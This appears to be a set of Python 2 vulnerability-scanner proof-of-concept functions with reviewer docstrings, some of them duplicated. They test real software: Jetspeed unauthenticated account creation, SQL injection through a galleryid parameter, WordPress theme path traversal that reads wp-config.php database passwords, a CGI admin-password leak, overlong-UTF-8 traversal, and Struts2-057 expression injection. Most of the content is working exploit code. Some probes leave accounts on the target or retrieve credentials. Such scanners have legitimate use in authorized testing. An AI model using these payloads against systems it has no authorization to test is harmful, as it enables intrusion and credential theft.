def poc(url):
    """Probe the Jetspeed user-manager REST endpoint for unauthenticated
    user creation.

    The same creation request is POSTed twice; the second attempt is expected
    to be refused with PRINCIPAL_ALREADY_EXISTS, and that marker is what the
    check keys on. A positive result therefore presumably leaves a new
    account (random 6-character name and password) on the target, and nothing
    here removes it again — treat the probe as non-read-only.

    :param url: target URL, or host[:port] without a scheme
    :return: True when the marker is seen and ENABLE_EXP is off; False when
        the marker is absent, or on any request error with ENABLE_EXP off;
        when ENABLE_EXP is on the function falls through and returns None.
    """
    if '://' not in url:
        # Substring test, not port parsing: ':443' anywhere in the string
        # selects https.
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        # Both POSTs go out with TLS verification disabled (verify=False) and
        # a 10 s timeout. `firefox` is passed as a value here; other checks on
        # this page call `firefox()` — only one of the two can match the helper.
        requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False)
        c = requests.post(url1, data=data1, headers={'User-Agent': firefox}, timeout=10, verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        # NOTE(review): `.content` is bytes under Python 3, where this str
        # membership test raises TypeError — the code assumes Python 2.
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:  # Python 2-only syntax; `e` is never used
        if not ENABLE_EXP:
            return False
def poc(url):
    """Boolean-difference probe of the `galleryid` POST parameter.

    Two requests that differ only in the injected condition ('-1 OR 1=1'
    versus '-1 OR 1=2') are sent; both answering 200 with bodies of
    different length is taken as the signal. Length comparison is a
    heuristic — dynamic content (timestamps, nonces, ads) can also make the
    two bodies differ, so a True here is an indication, not proof.

    :param url: target URL; resolved through get_entry() before use
    :return: True on a length difference, False otherwise or on any request
        error; when CHECK_WAF is set and has_waf() fires, a descriptive
        string is returned instead of a bool, so callers must not rely on
        a boolean result.
    """
    target = get_entry(url)
    if not target:
        return False

    if CHECK_WAF and has_waf(target):
        return '[Uncertain,WAF detected!] ' + get_domain(target)

    # [P] is the placeholder swapped for the two test conditions below.
    data_temp = "page=1&galleryid=[P]&task=load_videos_content&perpage=20&linkbutton=2"

    # Content-Type needed
    headers = {
        'User-Agent': loadfakeuseragent(),
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    try:
        # NOTE(review): neither request sets a timeout, so an unresponsive
        # target can block the scanner indefinitely.
        r1 = requests.post(target,
                           headers=headers,
                           data=data_temp.replace('[P]', '-1 OR 1=1'))
        r2 = requests.post(target,
                           headers=headers,
                           data=data_temp.replace('[P]', '-1 OR 1=2'))
    except:  # bare except: also swallows KeyboardInterrupt and SystemExit
        return False
    if r1.status_code == r2.status_code == 200 and len(r1.content) != len(
            r2.content):
        return True
    return False
def poc(url):
    """Check the ypo-theme download.php for unrestricted file read.

    The `download` parameter is given an URL-encoded `../` sequence that
    points at wp-config.php; the response is matched against two markers of
    that file. A match means the target's database credentials are readable
    from the web root, so the returned URL itself is sensitive output.

    :param url: target URL or host
    :return: the probe URL on a match; otherwise the function falls through
        and returns None (no explicit False, unlike the sibling checks).
    """
    if '://' not in url:
        url = 'http://' + url
    payload = '/wp-content/themes/ypo-theme/download.php?download=..%2F..%2F..%2F..%2Fwp-config.php'
    target = get_domain(url).rstrip('/') + payload
    try:
        r = urllib2.urlopen(target, timeout=5).read()  # cannot use requests here
        # Both markers must be present to reduce false positives.
        if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
            return target
    except Exception, e:  # Python 2-only syntax; `e` unused; errors are dropped silently
        pass
def poc(url):
    """Check the bonkersbeat theme's dl-skin.php for unrestricted file read.

    Passing `data` to urllib2.urlopen turns the request into a POST; the
    form field points at wp-config.php via `../` segments and the response
    is matched against two markers of that file. A match means the target's
    database credentials are readable, so the returned URL is sensitive.

    :param url: target URL or host
    :return: the probe URL on a match; False otherwise or on any request error.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = '/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php'
    target = get_domain(url).rstrip('/') + payload
    try:
        r = urllib2.urlopen(target, data="_mysite_download_skin=../../../../../wp-config.php", timeout=5).read()
        # Both markers must be present to reduce false positives.
        if "define('DB_PASSWORD'" in r and '@package WordPress' in r:
            return target
    except Exception:
        pass  # request errors are treated as "not vulnerable"
    return False
def poc(url):
    """Check /cgi-bin/readfile.cgi?query=ADMINID for leakage of admin settings.

    The response is matched on 'var Adm_Pass1', which looks like an admin
    password variable; a match therefore means credential material was
    returned and the probe URL should be handled as sensitive output.

    :param url: target URL or host
    :return: the probe URL on a match; False otherwise or on any request error.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = "/cgi-bin/readfile.cgi?query=ADMINID"
    # NOTE(review): no rstrip('/') here, unlike sibling checks — if
    # get_domain() ever returns a trailing slash the path gets a double '/'.
    target_url = get_domain(url) + payload
    try:
        r = requests.get(target_url, timeout=10)
        # NOTE(review): `.content` is bytes under Python 3, where this str
        # membership test raises TypeError — Python 2 assumed.
        if 'var Adm_Pass1' in r.content:
            return target_url
    except Exception:
        pass  # request errors are treated as "not vulnerable"
    return False
def poc(url):
    """Check for path traversal through overlong-UTF-8-encoded '..' segments.

    The probe asks for META-INF/MANIFEST.MF below /theme/ using %c0%ae%c0%ae
    in place of '..'; any body containing 'Version' is taken as success.
    That marker is weak — an ordinary page that mentions "Version" also
    matches — so a True here should be confirmed by hand.

    :param url: target URL or host
    :return: True when the marker is present; False otherwise or on any
        request error.
    """
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        # `firefox()` is called here, while other checks on this page pass
        # `firefox` as a value — only one usage can match the helper.
        c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
    except Exception:
        return False
    # NOTE(review): `.content` is bytes under Python 3, where this str
    # membership test raises TypeError — Python 2 assumed.
    if 'Version' in c:
        return True
    return False
def poc(url):
    """Check /cgi-bin/readfile.cgi?query=ADMINID for leakage of admin settings.

    Identical to the earlier readfile.cgi example on this page. The response
    is matched on 'var Adm_Pass1', which looks like an admin password
    variable; a match means credential material was returned and the probe
    URL should be handled as sensitive output.

    :param url: target URL or host
    :return: the probe URL on a match; False otherwise or on any request error.
    """
    if '://' not in url:
        url = 'http://' + url
    payload = "/cgi-bin/readfile.cgi?query=ADMINID"
    # NOTE(review): no rstrip('/') here, unlike sibling checks — if
    # get_domain() ever returns a trailing slash the path gets a double '/'.
    target_url = get_domain(url) + payload
    try:
        r = requests.get(target_url, timeout=10)
        # NOTE(review): `.content` is bytes under Python 3, where this str
        # membership test raises TypeError — Python 2 assumed.
        if 'var Adm_Pass1' in r.content:
            return target_url
    except Exception:
        pass  # request errors are treated as "not vulnerable"
    return False
def poc(url):
    """Check for path traversal through overlong-UTF-8-encoded '..' segments.

    Identical to the earlier MANIFEST.MF example on this page. The probe asks
    for META-INF/MANIFEST.MF below /theme/ using %c0%ae%c0%ae in place of
    '..'; any body containing 'Version' is taken as success. That marker is
    weak, so a True here should be confirmed by hand.

    :param url: target URL or host
    :return: True when the marker is present; False otherwise or on any
        request error.
    """
    if '://' not in url:
        url = 'http://' + url
    url = get_domain(url)
    payload = '/theme/META-INF/%c0%ae%c0%ae/META-INF/MANIFEST.MF'
    try:
        # `firefox()` is called here, while other checks on this page pass
        # `firefox` as a value — only one usage can match the helper.
        c = requests.get(url + payload, headers={'User-Agent': firefox()}, timeout=10).content
    except Exception:
        return False
    # NOTE(review): `.content` is bytes under Python 3, where this str
    # membership test raises TypeError — Python 2 assumed.
    if 'Version' in c:
        return True
    return False
def poc(url, **kwargs):
    """Check for Struts2-057 (expression evaluation in a URL path segment).

    A `${a-b}` expression built from two random operands is inserted as a
    path segment in front of the action name. If the server evaluates it,
    the 302 Location header — and the page it points to — contain the
    computed difference, which is what the check looks for. Using random
    operands keeps the marker unguessable, so a stale cached page cannot
    produce a false positive.

    :param url: target URL
    :param kwargs: optional 'ip' and 'port'; when 'ip' is given the URL is
        rebuilt as http://ip:port (a missing 'port' makes the string
        concatenation raise TypeError)
    :return: a result message on a hit; otherwise the loop finishes and the
        function falls through, returning None.
    """
    if kwargs.get('ip'):
        url = 'http://' + kwargs.get('ip') + ':' + kwargs.get('port')
    else:
        url = url  # no-op branch
    timeout = 10
    domain = get_domain(url)
    proxies = {'http': '127.0.0.1:9999'}  # defined but never passed to requests — dead local
    headers = {
        "User-Agent":
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0'
    }
    # Random operands; their difference is the value expected back from the
    # server if the expression was evaluated.
    ran_a = random.randint(10000000, 20000000)
    ran_b = random.randint(1000000, 2000000)
    ran_check = ran_a - ran_b
    parser = urlparse(url)
    if parser.path:
        # Keep only the last path segment (the action name); despite its
        # name, `_path_list` is a single string.
        _path_list = parser.path.replace('//', '/').strip('/').split('/')[-1]
    else:
        _path_list = 'index.action'
    url_list = iterate_path(url)  # presumably yields candidate base URLs — see helper
    for urls in url_list:
        url = urls + '/${%s-%s}/%s' % (ran_a, ran_b, _path_list)
        try:
            # Redirects are not followed: the Location header itself is the
            # thing inspected.
            res = requests.get(
                url,
                timeout=timeout,
                headers=headers,
                allow_redirects=False,
                verify=False,
            )
            if res.status_code == 302 and res.headers.get(
                    'Location') is not None and str(
                        ran_check) in res.headers.get('Location'):
                urlLoca = res.headers.get('Location')
                # Follow the redirect manually and require the evaluated
                # value in the body as well, as a second confirmation.
                res2 = requests.get(domain + urlLoca,
                                    headers=headers,
                                    timeout=6,
                                    allow_redirects=False,
                                    verify=False)
                if str(ran_check) in res2.text:
                    result = "目标存在 Struts2-057, check url: %s" % url
                    return result
        except:  # bare except: also swallows KeyboardInterrupt and SystemExit
            pass
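def checkCDN(url, timeout=15):
    """
    Detect whether the website sits behind a CDN or cloud-based web
    application firewall.

    The lookup is delegated to a third-party service (ce.cloud.360.cn): the
    target domain is submitted there over plain HTTP, the service's
    distributed nodes resolve it, and the set of IPs they report is read
    back. More than one distinct IP is reported as a CDN. Note that this
    discloses the scan target to that external service in clear text.

    :param url: Target URL or Domain
    :param timeout: per-request timeout in seconds for every call to the
        external service (the original had none and could hang the scanner)
    :return: a message string, not a bool — the domain followed by
        ' [Target Unknown]' when no IPs came back; otherwise the node count,
        the distinct-IP count and the IPs, with ' [CDN Found!]' added when
        more than one distinct IP was reported.
    """
    url = 'http://' + url if '://' not in url else url
    url = get_domain(url)

    dest = 'http://ce.cloud.360.cn/'

    # A Session keeps the service's cookies across the task/detect/getTaskDatas
    # sequence; the context manager closes its connection pool on exit.
    with requests.session() as s:
        data1 = _get_static_post_attr(s.get(dest, timeout=timeout).content)
        data1['domain'] = url
        s.post('http://ce.cloud.360.cn/task', data=data1, timeout=timeout)

        headers = {
            'X-Requested-With': 'XMLHttpRequest',
            'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'
        }
        s.post('http://ce.cloud.360.cn/Tasks/detect',
               data=data1,
               headers=headers,
               timeout=timeout)

        time.sleep(5)  # 5 sec delay for nodes to detect

        data = 'domain=' + url + '&type=get&ids%5B%5D=1&ids%5B%5D=2&ids%5B%5D=3&ids%5B%5D=4&ids%5B%5D=5&ids%5B%5D=6&ids%5B%5D=7&ids%5B%5D=8&ids%5B%5D=9&ids%5B%5D=16&ids%5B%5D=18&ids%5B%5D=22&ids%5B%5D=23&ids%5B%5D=41&ids%5B%5D=45&ids%5B%5D=46&ids%5B%5D=47&ids%5B%5D=49&ids%5B%5D=50&ids%5B%5D=54&ids%5B%5D=57&ids%5B%5D=58&ids%5B%5D=61&ids%5B%5D=62&ids%5B%5D=64&ids%5B%5D=71&ids%5B%5D=78&ids%5B%5D=79&ids%5B%5D=80&ids%5B%5D=93&ids%5B%5D=99&ids%5B%5D=100&ids%5B%5D=101&ids%5B%5D=103&ids%5B%5D=104&ids%5B%5D=106&ids%5B%5D=110&ids%5B%5D=112&ids%5B%5D=114&ids%5B%5D=116&ids%5B%5D=117&ids%5B%5D=118&ids%5B%5D=119&ids%5B%5D=120&ids%5B%5D=121&ids%5B%5D=122&user_ip_list='
        r = s.post('http://ce.cloud.360.cn/GetData/getTaskDatas',
                   data=data,
                   headers=headers,
                   timeout=timeout)

    # `.text` rather than `.content`: the str pattern would raise TypeError
    # against a bytes body under Python 3.
    ips = re.findall('"ip":"(.*?)"', r.text)
    ans = list(set(ips))
    msg = url

    if not ips:
        msg += ' [Target Unknown]'
        return msg

    msg += ' [CDN Found!]' if len(ans) > 1 else ''
    msg += ' Nodes:' + str(len(ips))
    msg += ' IP(%s):' % str(len(ans)) + ' '.join(ans)
    return msg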
def poc(url):
    """Probe the Jetspeed user-manager REST endpoint for unauthenticated
    user creation (same check as the first example on this page, reformatted).

    The same creation request is POSTed twice; the second attempt is expected
    to be refused with PRINCIPAL_ALREADY_EXISTS, and that marker is what the
    check keys on. A positive result therefore presumably leaves a new
    account (random 6-character name and password) on the target, and nothing
    here removes it again — treat the probe as non-read-only.

    :param url: target URL, or host[:port] without a scheme
    :return: True when the marker is seen and ENABLE_EXP is off; False when
        the marker is absent, or on any request error with ENABLE_EXP off;
        when ENABLE_EXP is on the function falls through and returns None.
    """
    if '://' not in url:
        # Substring test, not port parsing: ':443' anywhere in the string
        # selects https.
        if ':443' in url:
            url = 'https://' + url
        else:
            url = 'http://' + url
    url = get_domain(url).rstrip('/')

    user = randomString(6)
    password = randomString(6)

    url1 = url + '/jetspeed/services/usermanager/users/?_type=json'
    data1 = {
        'name': user,
        'password': password,
        'password_confirm': password,
        'user_name_given': 'foo',
        'user_name_family': 'bar',
        'user_email': '*****@*****.**',
        'newrule': ''
    }
    try:
        # Both POSTs go out with TLS verification disabled (verify=False) and
        # a 10 s timeout. `firefox` is passed as a value here; other checks on
        # this page call `firefox()` — only one of the two can match the helper.
        requests.post(url1,
                      data=data1,
                      headers={'User-Agent': firefox},
                      timeout=10,
                      verify=False)
        c = requests.post(url1,
                          data=data1,
                          headers={
                              'User-Agent': firefox
                          },
                          timeout=10,
                          verify=False).content
        # response: org.apache.jetspeed.security.SecurityException.PRINCIPAL_ALREADY_EXISTS
        # NOTE(review): `.content` is bytes under Python 3, where this str
        # membership test raises TypeError — the code assumes Python 2.
        if 'PRINCIPAL_ALREADY_EXISTS' in c:
            if not ENABLE_EXP:
                return True
        else:
            return False
    except Exception, e:  # Python 2-only syntax; `e` is never used
        if not ENABLE_EXP:
            return False